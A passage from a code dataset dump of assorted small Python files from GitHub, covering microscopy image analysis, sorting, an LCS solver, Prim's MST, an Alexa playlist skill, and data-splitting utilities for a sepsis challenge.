skio.imread(\"%s%s/%s_ch03.tif\" % (data_dir, sample, file_name), plugin=\"tifffile\")\n\nn_nuclear_convex_dilation = 12\nlocal_size = 200\nrmax = 100\nmax_area = 60000\nmin_circ = 0.8\n\n\ndef img_to_pixel_int(mask: np.array, img: np.array):\n index = [i for i, e in enumerate(mask.flatten()) if e != 0]\n out = list(map(img.flatten().__getitem__, index))\n return out\n\npos_bg = []\nneg_bg = []\n\nfor f in range(img_hoechst_stack.shape[0]):\n fov = start_fov+f\n print(\"Analyzing %s, fov %s\" % (sample1, fov))\n img_nuclear_bgc = img_hoechst_stack[fov, :, :]\n img_mCherry_bgc = img_mCherry_stack[fov, :, :]\n img_DNAFISH_bgc = img_DNAFISH_stack[fov, :, :]\n img_seg = skio.imread(\"%s%s/seg_tif/%s/%s_%s_seg.tif\" % (data_dir2, sample1, batch, sample1, fov), plugin=\"tifffile\")\n\n if n_nuclear_convex_dilation > 0:\n img_nuclear_seg = dilation(img_seg, disk(n_nuclear_convex_dilation))\n\n # measure\n # get local images\n mCherry_props = regionprops(img_seg, img_mCherry_bgc)\n for i in range(min(len(mCherry_props), 5)):\n if (mCherry_props[i].area < max_area) & (\n (4 * math.pi * mCherry_props[i].area) / (mCherry_props[i].perimeter ** 2) > min_circ):\n\n print(\"Analyzing %s, fov %s, nuclear %s/%s\" % (sample1, fov, i + 1, len(mCherry_props)))\n original_centroid_nuclear = mCherry_props[i].centroid\n position = ima.img_local_position(img_nuclear_seg, original_centroid_nuclear, local_size)\n local_nuclear_seg = ima.img_local_seg(img_nuclear_seg, position, mCherry_props[i].label)\n local_nuclear = img_nuclear_bgc.copy()\n local_nuclear = local_nuclear[position[0]:position[1], position[2]:position[3]]\n local_DNAFISH = img_DNAFISH_bgc.copy()\n local_DNAFISH = local_DNAFISH[position[0]:position[1], position[2]:position[3]]\n local_DNAFISH[local_nuclear_seg == 0] = 0\n\n viewer = napari.Viewer()\n viewer.add_image(local_DNAFISH, blending='additive', colormap='green', contrast_limits=[0, local_DNAFISH.max()])\n shapes = viewer.add_shapes(name='Shapes', ndim=2)\n napari.run()\n\n poly_data = shapes.data[0]\n shapes_layer = viewer.layers['Shapes']\n top, left = np.floor(np.min(poly_data, axis=0))\n bottom, right = np.ceil(np.max(poly_data, axis=0))\n top, bottom = np.clip((top, bottom), 0, local_DNAFISH.shape[0] - 1).astype(int)\n left, right = np.clip((left, right), 0, local_DNAFISH.shape[1] - 1).astype(int)\n output_shape = (bottom - top + 1, right - left + 1)\n # generate sub_masks and sub_channels\n sub_masks = shapes_layer._data_view.to_masks(mask_shape=output_shape, offset=(top, left))[0]\n local_DNAFISH_mask = local_DNAFISH[top:bottom + 1, left:right + 1] * sub_masks\n bg = regionprops(label(sub_masks), local_DNAFISH_mask)[0].intensity_mean\n\n if mCherry_props[i].intensity_mean > pos_threshold:\n pos_bg.append(bg)\n print('pos: %s' % len(pos_bg))\n elif mCherry_props[i].intensity_mean < neg_threshold:\n neg_bg.append(bg)\n print('neg: %s' % len(neg_bg))\n\n background = pd.DataFrame()\n background['sample'] = [sample1_pos] * len(pos_bg) + [sample1_neg] * len(neg_bg)\n background['bg'] = pos_bg + neg_bg\n if batch > 0:\n background.to_csv('%s%s_%s_background.txt' % (output_dir, sample1, batch), index=False, sep='\\t')\n else:\n background.to_csv('%s%s_background.txt' % (output_dir, sample1), index=False, sep='\\t')\n\n\nprint(\"DONE!\")","repo_name":"xwyan1230/ecDNA_napari-env","sub_path":"analysis/20_20230216_mixing_BRD4-series/23_20230222_background_measurement.py","file_name":"23_20230222_background_measurement.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36217793414","text":"class QuickSort:\n \n def partition(array, start, end):\n pivot = array[-1]\n i = start - 1\n for j in range(start, end - 1):\n if (array[j] < pivot):\n i += 1\n temp = array[i]\n array[i] = array[j]\n array[j] = temp\n i += 1\n temp = array[i]\n array[i] = array[end]\n array[end] = temp\n \n return i\n \n def quickSort(array, start, end):\n if end <= start:\n return\n pivot:int = partition(array, start, end)\n quickSort(array, start, pivot - 1)\n quickSort(array, pivot + 1, end)\n \n \n \n array = [8, 7, 9, 2, 3, 1, 5, 4, 6]\n\n quickSort(array, 0, len(array) - 1)\n\n output = \"\"\n for num in array:\n output += (f'{num} ')\n print(output)","repo_name":"hyeokjinjin/DSA-Practice","sub_path":"Sort/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18761312796","text":"import csv\n\nfrom cs50 import SQL\n\ndb = SQL(\"sqlite:///favorites.db\")\n\ntitle = input(\"Title: \").strip()\n\n# this db.execute returns us a list\nrows = db.execute(\"SELECT title FROM fav WHERE title LIKE ?\", title) # ? in SQL is like %s in C\n\nfor row in rows:\n print(row[\"title\"])","repo_name":"imxkamil/cs50","sub_path":"projects/pset7/crud/fav2.py","file_name":"fav2.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21254081922","text":"# Escrever arquivo em Python.\nelemento = int(input('\\nInforme o número de elementos para o arquivo: '))\nprint()\ndado = [input(\"Dado: \") for i in range(elemento)]\nprint(f'\\n\\033[0;32m{dado}\\033[m foi adicionado ao arquivo data_base.')\nprint('\\n\\033[0;36mOs dados informados foram salvos no arquivo data_base.txt!\\033[m\\n')\nwith open('data_base.txt', 'a') as arquivo:\n for dados in dado:\n arquivo.write(dados + '\\n')\n\n'''\nwith open('data_base_01.txt', 'w') as arquivo:\n arquivo.write(str(dado))\n\n# Excluir arquivo em Python.\nimport os\nif os.path.exists('data_base.txt'):\n os.remove('data_base.txt')\nelse:\n print('\\nO arquivo informado não existe!\\n')\n'''","repo_name":"jonathansilveira1987/MACETES","sub_path":"PYTHON/escrever_arquivo_e_salvar.py","file_name":"escrever_arquivo_e_salvar.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20965248704","text":"import argparse\nimport logging\n\n__logger = logging.getLogger(__name__)\n\n\ndef read_args() -> argparse.ArgumentParser:\n \"\"\"\n function defines input arguments\n :return: input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description=\"AI style transfer allows to transform \"\n \"input image(s) into output image(s) by using style image(s) \"\n \"as a pattern.\",\n epilog=\"The End!\")\n\n parser.add_argument('-m', '--mode', type=str,\n choices=[\"dir\", \"file\", \"url\"], required=True,\n help='If \"dir\" mode, program uses input dir and style dir.\\n'\n 'If \"file\" mode, you can specify files instead of directories.\\n'\n 'If \"url\" mode, you can specify urls for input and style images.')\n parser.add_argument('-i', '--input', default=\"images/input\", type=str,\n help='For \"mode\" eq \"dir\" it is an input images dir.\\n'\n 'For \"mode\" eq \"file\" it is a path to input image.\\n'\n 'For \"mode\" eq \"url\" it is a url to input image.')\n parser.add_argument('-e', '--epochs', default=5, type=int,\n help='Number of epochs')\n parser.add_argument('-s', '--style', default=\"images/styles\", type=str,\n help='For \"mode\" eq \"dir\" it is style images dir.\\n'\n 'For \"mode\" eq \"file\" it is a path to style image.\\n'\n 'For \"mode\" eq \"url\" it is a url to style image.')\n parser.add_argument('-o', '--output-dir', default=\"images/output\", type=str,\n help='Output dir. Default value: \"images/output\"')\n parser.add_argument('-w', '--width', default=800, type=int,\n help='Output image width. Height will be calculated based on this value')\n parser.add_argument('-f', '--max-fun', default=30, type=int,\n help='Maximum number of function evaluations for optimizer')\n parser.add_argument('--input-weight', default=0.1, type=float,\n help='Input image weight')\n parser.add_argument('--style-weight', default=0.9, type=float,\n help='Style image weight')\n parser.add_argument('--variation-weight', default=1e-4, type=float,\n help='Variation weight')\n parser.add_argument('-v', '--verbose', action='count',\n help='Use flag for more detailed logs')\n\n if parser.parse_args().verbose:\n __logger.info(\"Input arguments: {}\".format(parser.parse_args()))\n return parser\n","repo_name":"robertobloj/ai-style-transfer","sub_path":"utils/args_utils.py","file_name":"args_utils.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24011614367","text":"import statistics\nimport math\n\nfilename = \"/home/wonziu/Documents/adventofcode/Day_7/input.txt\"\n\ndef first(data):\n align = round(statistics.median(data))\n return sum(abs(align - x) for x in data)\n\ndef triangular_distance(x, y):\n return int(abs(x - y) * (1 + abs(x - y)) / 2)\n\ndef second(data):\n align = statistics.mean(data)\n lower = int(math.floor(align))\n upper = int(math.ceil(align))\n return min(sum(triangular_distance(lower, x) for x in data), sum(triangular_distance(upper, x) for x in data))\n\nif __name__ == '__main__':\n with open(filename) as file:\n data = list(map(int, file.read().rstrip().split(',')))\n print(first(data))\n print(second(data))\n","repo_name":"mleonowicz/aoc-2021","sub_path":"Day_7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19532514201","text":"#difference\nfriends = {\"Bob\", \"Anne\", \"Rolf\"}\nabroad = {\"Bob\", \"Anne\"}\n\nlocal_friends = friends.difference(abroad)\nprint(local_friends)\n\n#union\ntwo_fruits = {\"Orange\", \"Tangerine\"}\none_fruit = {\"Apple\"}\nshake = two_fruits.union(one_fruit)\nprint(shake)\n\n#intersection\nart = {\"Bob\", \"Jen\", \"Rolf\", \"Charlie\"}\nscience = {\"Bob\", \"Jen\", \"Adam\", \"Anne\"}\nboth = art.intersection(science)\nprint(both)","repo_name":"Vincetroid/learning-python","sub_path":"rest_apis_with_flask_and_python/advanced-set-operations.py","file_name":"advanced-set-operations.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2652656754","text":"import numpy as np\nfrom os import listdir\nfrom iterative_interpolation import *\n\n# path = \"D:\\Physionet Challenge\\old_data\\\\\"\npath = r\"D:\\Physionet Challenge\\GitHub\\pnet2019\\training\\\\\"\n\n\ndef replace_nan(data, patients_id, value=None):\n new_dataset = []\n for id in np.unique(patients_id):\n print(id)\n features_ = data[np.where(patients_id == id)[0]]\n patient = []\n for h in range(len(features_)):\n features = features_[:h+1]\n aux = []\n for feature in features.T:\n mean = np.nanmean(feature)\n std = np.nanstd(feature)\n if ~np.isnan(feature).all():\n if value == 'mean':\n aux.append(np.nan_to_num(feature, nan=mean)[-1])\n elif value == 'normal':\n for j, measure in enumerate(feature):\n if np.isnan(measure):\n feature[j] = np.random.normal(mean, std)\n aux.append(feature[-1])\n elif value == 'interpolation':\n nan_bounds(feature)\n nan_interpolate(feature)\n aux.append(feature[-1])\n else:\n aux.append(np.nan_to_num(feature)[-1])\n else:\n aux.append(np.zeros(np.shape(feature))[-1])\n # print(np.shape(aux))\n patient.append(aux)\n new_dataset.append(np.vstack(patient))\n print(np.shape(new_dataset))\n return np.vstack(new_dataset)\n\n\n# data = np.load(\"./Datasets/training_AB.npy\")\n# patients_id = np.load(\"./Datasets/training_AB_patient.npy\")\n#\n# # dataset = replace_nan(data, patients_id, 'mean')\n# # np.save(\"training_AB_mean_causal\", dataset)\n# #\n# # dataset_2 = replace_nan(data, patients_id, 'normal')\n# # np.save(\"training_AB_normal_causal\", dataset_2)\n#\n# dataset = replace_nan(data, patients_id, 'interpolation')\n# np.save(\"training_AB_interp_causal\", dataset)\n\n\ndef generate_new_dataset(path, name='new_dataset_AB.npy'):\n '''\n This function generates a npy file with the data present in the files in path.\n The generated npy are (in terms of columns): features, label of sample, label of patient, patient ID.\n \n :params:\n path: (str)\n path to the folder containing the psv files.\n name: (str)\n name of the generated npy file.\n '''\n dataset = np.zeros(shape=(1, 43))\n for i, file in enumerate(listdir(path)):\n print(i)\n if '.psv' in file: #'p1' in file:\n with open(path+file, 'r') as f:\n header = f.readline().strip()\n column_names = header.split('|')\n data = np.loadtxt(f, delimiter='|')\n if 1 in data[:, -1]:\n num = np.ones\n else:\n num = np.zeros\n data = np.hstack([data, num(shape=(data.shape[0], 1))])\n id = int(file.strip('p.psv'))\n id_set = np.array([id]*data.shape[0]).reshape(-1, 1)\n data = np.hstack([data, id_set])\n dataset = np.vstack([dataset, data])\n print(dataset.shape)\n np.save(name, dataset[1:])\n\n\ndef GroupStratifiedKFold(dataset, n_split=10):\n '''\n Split the data in Stratified K folds considering the groups.\n Namely, the same group can not appear in the training and testing set at the same time (iteration).\n Note: This function only works with binary tasks.\n\n :params:\n dataset: (numpy.array)\n The dataset to split in train and test sets. It is expected to have the format of: features,\n labels per sample, labels per patient, patient ID.\n n_split: (int)\n The number of folds to use in cross validation.\n\n :returns:\n train_indexes: (numpy.array)\n Indexes of the trainning samples in order.\n It should be iterated such as: X_train, y_train = X[train_indexes[i]], y[train_indexes[i]]\n test_indexes: (numpy.array)\n Indexes of the trainning samples in order.\n It should be iterated such as: X_test, y_test = X[test_indexes[i]], y[test_indexes[i]]\n\n Note that the iteration of train_indexes[i] and test_indexes[i] should always be the same!\n\n :Example:\n\n ...\n\n train_index, test_index = GroupStratifiedKFold(np.hstack([features, labels.reshape(-1,1), labels_patient, patient_id]), 10)\n\n for j in range(len(train_index)):\n print(\"TRAIN:\", train_index[j], \"TEST:\", test_index[j])\n X_train, X_test = X[train_index[j]], X[test_index[j]]\n y_train, y_test = y[train_index[j]], y[test_index[j]]\n\n ...\n '''\n old_id = 0\n patient = []\n patients_healthy_ind = []\n patients_sepsis_ind = []\n aux_ind = []\n for i, sample in enumerate(dataset):\n if sample[-1] == old_id:\n patient.append(sample[-2])\n aux_ind.append(i)\n else:\n old_id = sample[-1]\n if 1 in np.array(patient):\n patients_sepsis_ind.append(np.array(aux_ind, dtype=int))\n else:\n patients_healthy_ind.append(np.array(aux_ind, dtype=int))\n patient = [sample[-2]]\n aux_ind = [i]\n if 1 in np.array(patient):\n patients_sepsis_ind.append(np.array(aux_ind, dtype=int))\n else:\n patients_healthy_ind.append(np.array(aux_ind, dtype=int))\n\n patients_healthy = np.array(patients_healthy_ind)\n patients_sepsis = np.array(patients_sepsis_ind)\n\n print(patients_healthy.shape)\n print(patients_sepsis.shape)\n\n len_sepsis = len(patients_sepsis)\n len_healthy = len(patients_healthy)\n\n sepsis_nbr = int(len_sepsis // n_split)\n healthy_nbr = int(len_healthy // n_split)\n\n test_sepsis = []\n test_healthy = []\n train_sepsis = []\n train_healthy = []\n\n ind = 0\n while ind in range(n_split):\n first_in_sepsis = ind*sepsis_nbr\n second_in_sepsis = first_in_sepsis + sepsis_nbr\n\n print(\"Sepsis: \", first_in_sepsis, second_in_sepsis)\n\n first_in_healthy = ind * healthy_nbr\n second_in_healthy = first_in_healthy + healthy_nbr\n\n print(\"Normal: \", first_in_healthy, second_in_healthy)\n\n test_sepsis.append(np.concatenate(patients_sepsis[range(first_in_sepsis, second_in_sepsis)]))\n train_sepsis.append(np.concatenate(patients_sepsis[\n np.concatenate([range(first_in_sepsis), range(second_in_sepsis, len_sepsis)]).astype(int)]))\n test_healthy.append(np.concatenate(patients_healthy[range(first_in_healthy, second_in_healthy)]))\n train_healthy.append(np.concatenate(patients_healthy[\n np.concatenate([range(first_in_healthy),range(second_in_healthy, len_healthy)]).astype(int)]))\n ind += 1\n\n return np.array([np.concatenate([train_healthy[j], train_sepsis[j]]) for j in range(n_split)]),\\\n np.array([np.concatenate([test_healthy[i], test_sepsis[i]]) for i in range(n_split)])\n\n\n# generate_new_dataset(path, 'new_dataset_AB.npy')\n# dataset = np.load('D:\\Physionet Challenge\\GitHub\\pnet2019\\Rui\\Datasets\\dataset_A_mean_subs.npy')\n# train_indexes, test_indexes = GroupStratifiedKFold(dataset, 10)\n\n","repo_name":"malfarasplux/pnet2019","sub_path":"Rui/GroupStratifiedKFold.py","file_name":"GroupStratifiedKFold.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"35918555202","text":"'''\n\t@judge ZeroJudge\n\t@id d283\n\t@name 大數加法\n\n\t@tag Big Number, Fibonacci Number\n'''\nfrom sys import stdin\n\nfib = [0, 1]\nfor n in range(2, 20001):\n\tfib.append(fib[n - 1] + fib[n - 2])\n\nfor line in stdin:\n\tprint(fib[int(line)])","repo_name":"m80126colin/Judge","sub_path":"since2020/ZeroJudge/ZeroJudge d283.py","file_name":"ZeroJudge d283.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"22299176584","text":"#!/usr/bin/env python3\nimport sys\nsys.setrecursionlimit(15000)\nn = int(sys.stdin.readline())\n\ndef lcs(X,Y):\n n_y = len(Y)\n n_x = len(X)\n #dp = [[0]*(n_x+1) for _ in range(n_y+1)]\n dp = [0]*(n_x+1)\n for i_y in range(n_y):\n ndp = dp.copy()\n for i_x in range(n_x):\n if X[i_x] == Y[i_y]:\n #dp[i_y+1][i_x+1] = dp[i_y][i_x] + 1\n ndp[i_x+1] = dp[i_x] + 1\n elif dp[i_x+1] < ndp[i_x]:\n #dp[i_y+1][i_x+1] = max(dp[i_y+1][i_x],dp[i_y][i_x+1])\n ndp[i_x+1] = ndp[i_x]\n dp = ndp\n #print(dp)\n #return(dp[-1][-1])\n return(dp[-1])\n\nret = []\ninp = sys.stdin.readlines()\nfor i in range(n):\n X = inp[2*i].rstrip()#[:-1]#input()\n Y = inp[2*i+1].rstrip()#[:-1]#input()\n ret.append(lcs(X,Y))\n #print\n\nprint(*ret,sep=\"\\n\")\n","repo_name":"uk-ar/competitive_programming","sub_path":"aoj/alds1_10_c.py","file_name":"alds1_10_c.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31965204772","text":"\"\"\"\nThis sample demonstrates a simple skill built with the Amazon Alexa Skills Kit.\nThe Intent Schema, Custom Slots, and Sample Utterances for this skill, as well\nas testing instructions are located at http://amzn.to/1LzFrj6\n\nFor additional samples, visit the Alexa Skills Kit Getting Started guide at\nhttp://amzn.to/1LGWsLG\n\"\"\"\n\nfrom __future__ import print_function\nfrom watsonAlchemy import getSentiment\nfrom findPlaylist import findPlaylist\nimport requests\nimport json\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the All The Feels Poly Hacks 2017 Project. \" \\\n \"Please tell me how your day was \"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"I didn't catch that. \" \\\n \"Please tell me how your day was by saying something like \" \\\n \"My day was pretty good, thank you.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the All The Feels Poly Hacks 2017 Project. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef convert_feelings_to_rating(feeling):\n ratingJSON = getSentiment(feeling)\n return ratingJSON['score']\n\ndef set_mood_in_session(intent, session):\n card_title = intent['name']\n session_attributes = {}\n should_end_session = False\n\n if 'Feeling' in intent['slots']:\n feeling = intent['slots']['Feeling']['value']\n score = convert_feelings_to_rating(feeling)\n session_attributes['userResponse'] = feeling\n session_attributes['score'] = score\n session_attributes['playlists'] = findPlaylist(float(score))\n session_attributes['index'] = 0\n currentPlaylist = session_attributes['playlists'][session_attributes['index']]['name']\n score = float(score)\n if score < -0.8:\n speech_output = \"I'm sorry to hear that. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n elif score < -0.5:\n speech_output = \"I'm sure your day will get better. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n elif score < 0:\n speech_output = \"I feel you. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n elif score < 0.5:\n speech_output = \"I'm glad to hear that. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n else:\n speech_output = \"That's so lit. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n reprompt_text = \". Sorry, I didn't catch that. Would you like to listen to \" + \\\n currentPlaylist\n else:\n speech_output = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n reprompt_text = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef cheerUp(intent, session):\n card_title = intent['name']\n session_attributes = {}\n should_end_session = False\n\n if \"playlists\" in session.get('attributes', {}):\n score = 1\n session_attributes['score'] = score\n session['attributes']['playlists'] = findPlaylist(score)\n session['attributes']['index'] = 0\n currentPlaylist = session['attributes']['playlists'][session['attributes']['index']]['name']\n speech_output = \"I'll make you feel better. Would you like to listen to \" + \\\n currentPlaylist\n reprompt_text = \". Sorry, I didn't catch that. Would you like to listen to \" + \\\n currentPlaylist\n else:\n speech_output = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n reprompt_text = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n return build_response(session['attributes'], build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef get_playlists_from_session_yes(intent, session):\n session_attributes = {}\n reprompt_text = None\n request = requests.Session()\n\n if \"playlists\" in session.get('attributes', {}):\n playlists = session['attributes']['playlists']\n index = session['attributes']['index']\n currentPlaylist = playlists[index]['name']\n currentURI = playlists[index]['URI']\n url = 'http://6da862e2.ngrok.io/AllTheFeels/webresources/allthefeels/spotify/'\n request.get(url+str(currentURI))\n session['attributes']['index'] = index + 1\n speech_output = \"Say no more, Now Playing \" + currentPlaylist\n should_end_session = True\n else:\n speech_output = \"I'm not sure what your favorite color is. \" \\\n \"You can say, my favorite color is red.\"\n should_end_session = False\n\n # Setting reprompt_text to None signifies that we do not want to reprompt\n # the user. If the user does not respond or says something that is not\n # understood, the session will end.\n return build_response(session['attributes'], build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef get_playlists_from_session_no(intent, session):\n session_attributes = {}\n\n if \"playlists\" in session.get('attributes', {}):\n playlists = session['attributes']['playlists']\n index = session['attributes']['index']\n session['attributes']['index'] = index + 1\n currentPlaylist = playlists[index+1]['name']\n\n if index < len(playlists):\n speech_output = \"Alright, would you like to listen to \" + currentPlaylist + \\\n \" instead.\"\n reprompt_text = \"Sorry, I didn't catch that. Would you like to listen to \" + currentPlaylist + \\\n \" instead. \"\n should_end_session = False\n else:\n speech_output = \"Okay, sorry you didn't like that, but we are all out of options.\"\n reprompt_text = None\n should_end_session = True\n else:\n speech_output = \"I'm not sure what your favorite color is. \" \\\n \"You can say, my favorite color is red.\"\n reprompt_text = None\n should_end_session = False\n\n # Setting reprompt_text to None signifies that we do not want to reprompt\n # the user. If the user does not respond or says something that is not\n # understood, the session will end.\n return build_response(session['attributes'], build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"ScanFeels\":\n return set_mood_in_session(intent, session)\n elif intent_name == \"AMAZON.YesIntent\":\n return get_playlists_from_session_yes(intent,session)\n elif intent_name == \"AMAZON.NoIntent\":\n return get_playlists_from_session_no(intent,session)\n elif intent_name == \"CheerUp\":\n return cheerUp(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","repo_name":"DavidIsrawi/AllTheFeels","sub_path":"lambdaCode/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":11711,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"75"} +{"seq_id":"28971312629","text":"\"\"\"\nHow to build minimum spanning tree with Prim's Algorithm\n\n1) Pick any node as a starting point.\n\n2) Use heapq ot pick smallest edge\n\n\n p0 1 p1\n *------*\n |\\ |\n | \\ 3 | 2\n | \\ |\n 4 | \\ |\n | \\ |\n | \\|\n *------*\n p3 5 p2\n\n minimum is 7 (4 + 1 + 2)\n\n--END--\n\"\"\"\n\nimport collections\nimport heapq\n\n\nclass Node:\n def __init__(self, p, w):\n self.p = p\n self.w = w\n\n def __lt__(self, other):\n return self.w < other.w\n\n\ndef mst(n, edges):\n # init\n cost = 0\n hq = []\n\n # build a graph\n g = collections.defaultdict(dict)\n for p1, p2, w in edges:\n g[p1][p2] = w\n g[p2][p1] = w\n\n # pick random node 0 into heapq\n heapq.heappush(hq, Node(0, 0))\n vst = set()\n\n # pick smallest edge at a time\n while hq:\n node = heapq.heappop(hq)\n\n # node is already visited\n if node.p in vst:\n continue\n\n cost += node.w\n vst.add(node.p)\n\n if len(vst) == n:\n break\n\n for nxt_node, nxt_w in g[node.p].items():\n heapq.heappush(hq, Node(nxt_node, nxt_w))\n\n\n # minimum cost is 7\n assert cost == 7\n\n\nedges = [[0, 1, 1], [1, 2, 2], [2, 3, 5], [3, 0, 4], [0, 2, 3]]\nmst(4, edges)\n","repo_name":"Lancher/coding-challenge","sub_path":"alortihms-before-interview/graph/4_mst/_prime.py","file_name":"_prime.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27472969252","text":"## compute bc\n# Compute Beltrami coefficients mu of mapping from uv to vertex, where vertex \n# can be 2D or 3D.\n# \n# mu from 2D to 2D is defined by the Beltrami equation:\n# \n# \\[ \\frac{\\partial{f}}{\\partial{\\bar{z}}} = \\mu \\frac{\\partial{f}}{\\partial{z}} \\]\n# \n# mu from 2D to 3D is defined by: \n# \n# \\[ \\mu = \\frac{E-G +2iF}{E+G +2\\sqrt{EG-F^2}} \\]\n# \n# where \\( ds^2=Edx^2+2Fdxdy+Gdy^2 \\) is metric.\n#\n## Syntax\n# mu = compute_bc(face,uv,vertex)\n#\nfrom algebra.face_area import *\nimport numpy as np\nfrom dbgtool.dbgtool import *\ndef compute_bc(face, uv, vertex):\n nf = face.shape[0]\n fa = face_area(face, uv)\n Duv = np.concatenate((uv[face[:, 2], :] - uv[face[:, 1], :], uv[face[:, 0], :] - uv[face[:, 2], :],\n uv[face[:, 1], :] - uv[face[:, 0], :]))\n fafafa = np.concatenate((fa, fa, fa))\n Duv[:, 0] = Duv[:, 0] / fafafa / 2.0\n Duv[:, 1] = Duv[:, 1] / fafafa / 2.0\n\n\n if vertex.shape[1] == 2:\n nv = vertex.shape[0]\n z = np.zeros(nv, np.complex)\n z.real = vertex[:, 0]\n z.imag = vertex[:, 1]\n flatface = np.concatenate((face[:, 0], face[:, 1], face[:, 2]))\n Dcz = 